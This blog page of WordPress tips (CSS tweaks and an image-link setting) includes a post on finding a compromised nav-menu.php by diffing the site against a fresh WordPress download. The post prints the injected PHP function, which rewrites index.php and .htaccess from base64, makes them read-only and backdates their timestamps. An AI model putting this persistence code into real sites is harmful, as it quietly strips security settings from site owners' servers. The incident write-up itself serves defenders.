Remove WordPress page title header using custom CSS

If you’ve ever needed to remove the title header from a specific WordPress page you can do it using custom CSS. No additional plugins required.  Copy and past the code below updating “.page-id-###” to reflect the ID# of your post or page.

/* Enter your remark here about why you’ve added this custom CSS */
.page-id-### .page-header {
display: none;
}

hacked WordPress is overwriting .htaccess

After years of quiet, faithful service my trusty little server was molested by the darkside.  A key part of my re-securing strategy involved making sure my .htaccess file was up to snuff.  I would attempt to save my newly edited .htaccess file and the editor would tell me the file had already “changed”. WTF?

If I stopped the apache2 service.. or firewalled 80 I was able to save the file,  close it.. open it.. etc and the changes stayed.. the second I unblocked 80, my .htaccess file reset itself to the basic WordPress .htaccess config.

I’d missed a compromised PHP script somewhere in the WP file system.  The uninvited code was was modifying the .htaccess file (set at 0444) to disable all the security features but leave WordPress in working condition.

“You fool! You failed to realize that, with your .htaccess compromised, my script will tear through yours like tissue paper.”

Diff command to the rescue! In a directory above WordPress, I created a temp directory, used wget to get the latest version of WordPress then “diff” command to hunt down the rogue script. (Note: this script was written for Ubuntu.)

sudo mkdir .tmp
cd .tmp
sudo wget //wordpress.org/latest.tar.gz –no-check-certificate
sudo tar -xzvf latest.tar.gz

sudo diff -qr /var/www/webz/.tmp/wordpress /var/www/webz/wordpress |grep differ

You clever girl:

Files /var/www/webz/.tmp/wordpress/wp-includes/nav-menu.php and /var/www/webz/wordpress/wp-includes/nav-menu.php differ

Every time someone browsed my site,  it fired off a compromised version of nav-menu.php and the injected code lobotomized index.php and .htaccess. Weeeee! 🙁  If you’re curious like I was,  copy the base64 code to https://www.base64decode.org/ and decode it to plain ascii.


 

function my_correct($dir) {
$time = 0;
$path = $dir . ‘/index.php’;
$content = base64_decode(‘PD9waHAKLyoqCiAqIEZyb250IHRvIHRoZSBXb3JkUHJlc3MgYXBwbGljYXRpb24uIFRoaXMgZmlsZSBkb2Vzbid0IGRvIGFueXRoaW5nLCBidXQgbG9hZHMKICogd3AtYmxvZy1oZWFkZXIucGhwIHdoaWNoIGRvZXMgYW5kIHRlbGxzIFdvcmRQcmVzcyB0byBsb2FkIHRoZSB0aGVtZS4KICoKICogQHBhY2thZ2UgV29yZFByZXNzCiAqLwoKLyoqCiAqIFRlbGxzIFdvcmRQcmVzcyB0byBsb2FkIHRoZSBXb3JkUHJlc3MgdGhlbWUgYW5kIG91dHB1dCBpdC4KICoKICogQHZhciBib29sCiAqLwpkZWZpbmUoJ1dQX1VTRV9USEVNRVMnLCB0cnVlKTsKCi8qKiBMb2FkcyB0aGUgV29yZFByZXNzIEVudmlyb25tZW50IGFuZCBUZW1wbGF0ZSAqLwpyZXF1aXJlKCBkaXJuYW1lKCBfX0ZJTEVfXyApIC4gJy93cC1ibG9nLWhlYWRlci5waHAnICk7Cg==’);
if (file_get_contents($path) != $content) {
chmod($path, 0644);
file_put_contents($path, $content);
chmod($path, 0444);
$time = my_time($dir);
touch($path, $time);
}


 

$path = $dir . ‘/.htaccess’;
$content = base64_decode(‘IyBCRUdJTiBXb3JkUHJlc3MKPElmTW9kdWxlIG1vZF9yZXdyaXRlLmM+ClJld3JpdGVFbmdpbmUgT24KUmV3cml0ZUJhc2UgLwpSZXdyaXRlUnVsZSBeaW5kZXhcLnBocCQgLSBbTF0KUmV3cml0ZUNvbmQgJXtSRVFVRVNUX0ZJTEVOQU1FfSAhLWYKUmV3cml0ZUNvbmQgJXtSRVFVRVNUX0ZJTEVOQU1FfSAhLWQKUmV3cml0ZVJ1bGUgLiAvaW5kZXgucGhwIFtMXQo8L0lmTW9kdWxlPgoKIyBFTkQgV29yZFByZXNzCg==‘);
if (file_exists($path) AND file_get_contents($path) != $content) {
chmod($path, 0644);
file_put_contents($path, $content);
chmod($path, 0444);
if (!$time) {
$time = my_time($dir);
}
touch($path, $time);
}
}

So no.. you’re not crazy.

Custom CSS for WordPress Search widget

The WordPress search form widget is seriously ugly.  This custom CSS will give you some control over the search widget only a mother could love.

.searchform input[type=”text”]{
width: 100%;
-webkit-border-radius: 2px;
-moz-border-radius: 2px;
border-radius: 2px;
}
.searchform input[type=”submit”]{
padding:5px 15px;
background:#FFF;
border:0 none;
cursor:pointer;
-webkit-border-radius: 2px;
-moz-border-radius: 2px
border-radius: 2px;
}

Default WordPress image link URL to “file URL”

I like using the WordPress plugin “Fancybox” to add clean fly out effects to images, PDFs, and YouTube videos.  I noticed  depending on the theme I was using sometimes you would click a newly inserted image and FancyBox worked other times  it took  you to an attachments page for the image.  That’s when it hit me.  For FancyBox to function correctly the link to the image has to be set as “file URL”.  It also dawned on me that some of my themes defaulted to “file URL” while others defaulted to “attachment URL”

To set your default image link URL to “file” add the bit of code below to your functions.php file.

update_option('image_default_link_type','file');

(Via WordPress Forum link Submitted by Adam Capriola)